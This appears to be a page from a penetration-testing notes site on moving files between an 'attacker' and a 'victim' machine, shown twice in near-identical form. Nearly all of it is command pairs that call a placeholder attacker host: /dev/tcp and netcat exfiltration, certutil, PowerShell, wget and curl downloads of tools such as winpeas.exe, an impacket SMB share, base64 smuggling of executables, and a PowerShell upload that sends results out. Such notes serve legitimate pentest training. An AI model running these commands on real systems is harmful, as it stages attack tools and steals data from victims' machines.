File Transfers and Download

TFTP(WINDOWS)

Attacker:

apt update && sudo apt install atftp
mkdir /tftp
chown nobody: /tftp
atftpd --daemon --port 69 /tftp

Victim Windows

tftp -i 192.168.1.2 PUT file1.txt
tftp -i 192.168.1.2 GET file2.txt

From victim's linux machine to our machine quickly

In attacker's machine

nc -lnvp attacker-port > file.extension

In victim machine

cat file_to_transfer.extension > /dev/tcp/attacker-ip/attacker-port

wget

wget can be used both to download a file from internet or we can host a file by starting a server in attacker(our) machine (in same directory where our file is located) and download that file in the victim machine.

In attacker machine

nc -lnvp 4444 < file.sh

In victim machine

wget http://attacker-machine-ip:4444/file.sh -O /tmp/file.sh

curl

curl can also be used both to download a remote file from internet or can be used to transfer file between computers same as wget.(Below file.sh is located in same directory where we are starting python server on port 8080)

In attacker machine

python3 -m http.server 8080

In victim pc

curl http://attacker-ip:8080/file.sh -o file.sh

axel

axel can also be used to download and transfer files in linux hosts.Below we start a php server on port 8000 on the same directory where our file(file.sh) is located and download the file in victim pc using axel.

attacker host:

php -S 10.10.11.32:8000

victim host

axel -a -n 20 http://10.10.11.32:8000/file.sh -o /tmp/file.sh

netcat

netcat can also be used to transfer files as well as listen for connections its basically a swiss army knife for hacking.Below we are transferring winpeas.exe from attacker machine to victim machine via port 5555.

In attacker machine

nc -lnvp 5555 < winpeas.exe

In victim host

nc attacker-ip 5555 > winpeas.exe

certutil

In windows certutil can be very efficient method to transfer files.Below we are starting python http server on port 9000 in the same directory where our file winpeas.exe is located.

In attacker pc:

python -m SimpleHTTPServer 9000

In victim pc

certutil -urlcache -f -split "http://attacker-ip:9000/winpeas.exe" C:\Windows\Temp\winpeas.exe

powershell

Here we should always use single quotes in powershell for both the url and the output file.

In attacker pc

python3 -m http.server 6000

In victim pc

powershell -c (New-Object Net.WebClient).DownloadFile('http://ip-addr:port/file', 'output-file')

In victim pc in powershell session:

Invoke-WebRequest -Uri http://attacker-ip:port/file -OutFile .\file

smb

In attacker pc using impacket

python3 /usr/share/doc/python-impacket/examples/smbserver.py hello .

In victim pc:

copy \\\ip-addr\hello\nc64.exe nc64-downloaded.exe

hello represents the sharename we can set it to anyname and "." represents the current directory where our file is located

Base64 method

we can encode the executable file in base64 format in our attacking machine and copy paste the encoded string inside a txt file in victim machine and save the file as an executable by decoding the file in the victim machine

In attacker machine

python -c 'print(__import__("base64").b64encode(open("file.exe", "rb").read()))'

In victim machine:

echo "encoded-string" > output.txt

In victim machine second step:

base64 -d output.txt > file.exe

scp file transfer

copying local file to remote server:

scp file.txt remote_username@10.10.0.2:/tmp/file.txt

copying remote file to local machine:

scp remote_username@10.10.0.2:/remote/binary.exe /local/directory

Rsync file transfer

copying local file to remote machine

rsync -av /path/to/mydirectory user@host:/path/to/upload/directory

copying remote file to local machine

rsync -avz user@host:/path/to/mydirectory-or-file ~/myfolder/

ftp(For file download to local pc)

In attacker pc:

python -m pyftpdlib -p 21 --write

In victim pc:

ftp attacker-ip

login with username anonymous and password anonymous then we can do:put file.exe from victim machine which will be saved attacker machine automatically and the path will be given in the attacker's machine output itself where the file has been saved.

Powershell webclient method(from victim windows to attacker's linux)

In attacker pc:

nc -lnvp 4444 > winpeas-result.out

In victim machine from powershell session:

$webclient = New-Object System.Net.WebClient;$webclient.UploadFile('http://attacker-ip:4444/','winpeas-result.out')

PreviousAttacking Active Directory NextPivoting(Tunneling and Port Forwarding)

Last updated 2 months ago

File Transfers and Download

TFTP(WINDOWS)

Attacker:

apt update && sudo apt install atftp
mkdir /tftp
chown nobody: /tftp
atftpd --daemon --port 69 /tftp

Victim Windows

tftp -i 192.168.1.2 PUT file1.txt
tftp -i 192.168.1.2 GET file2.txt

From victim's linux machine to our machine quickly

In attacker's machine

nc -lnvp attacker-port > file.extension

In victim machine

cat file_to_transfer.extension > /dev/tcp/attacker-ip/attacker-port

wget

In attacker machine

nc -lnvp 4444 < file.sh

In victim machine

wget http://attacker-machine-ip:4444/file.sh -O /tmp/file.sh

curl

In attacker machine

python3 -m http.server 8080

In victim pc

curl http://attacker-ip:8080/file.sh -o file.sh

axel

attacker host:

php -S 10.10.11.32:8000

victim host

axel -a -n 20 http://10.10.11.32:8000/file.sh -o /tmp/file.sh

netcat

In attacker machine

nc -lnvp 5555 < winpeas.exe

In victim host

nc attacker-ip 5555 > winpeas.exe

certutil

In windows certutil can be very efficient method to transfer files.Below we are starting python http server on port 9000 in the same directory where our file winpeas.exe is located.

In attacker pc:

python -m SimpleHTTPServer 9000

In victim pc

certutil -urlcache -f -split "http://attacker-ip:9000/winpeas.exe" C:\Windows\Temp\winpeas.exe

powershell

Here we should always use single quotes in powershell for both the url and the output file.

In attacker pc

python3 -m http.server 6000

In victim pc

powershell -c (New-Object Net.WebClient).DownloadFile('http://ip-addr:port/file', 'output-file')

In victim pc in powershell session:

Invoke-WebRequest -Uri http://attacker-ip:port/file -OutFile .\file

smb

In attacker pc using impacket

python3 /usr/share/doc/python-impacket/examples/smbserver.py hello .

In victim pc:

copy \\\ip-addr\hello\nc64.exe nc64-downloaded.exe

hello represents the sharename we can set it to anyname and "." represents the current directory where our file is located

Base64 method

In attacker machine

python -c 'print(__import__("base64").b64encode(open("file.exe", "rb").read()))'

In victim machine:

echo "encoded-string" > output.txt

In victim machine second step:

base64 -d output.txt > file.exe

scp file transfer

copying local file to remote server:

scp file.txt remote_username@10.10.0.2:/tmp/file.txt

copying remote file to local machine:

scp remote_username@10.10.0.2:/remote/binary.exe /local/directory

Rsync file transfer

copying local file to remote machine

rsync -av /path/to/mydirectory user@host:/path/to/upload/directory

copying remote file to local machine

rsync -avz user@host:/path/to/mydirectory-or-file ~/myfolder/

ftp(For file download to local pc)

In attacker pc:

python -m pyftpdlib -p 21 --write

In victim pc:

ftp attacker-ip

Powershell webclient method(from victim windows to attacker's linux)

In attacker pc:

nc -lnvp 4444 > winpeas-result.out

In victim machine from powershell session:

$webclient = New-Object System.Net.WebClient;$webclient.UploadFile('http://attacker-ip:4444/','winpeas-result.out')

PreviousAttacking Active Directory NextPivoting(Tunneling and Port Forwarding)

Last updated 2 months ago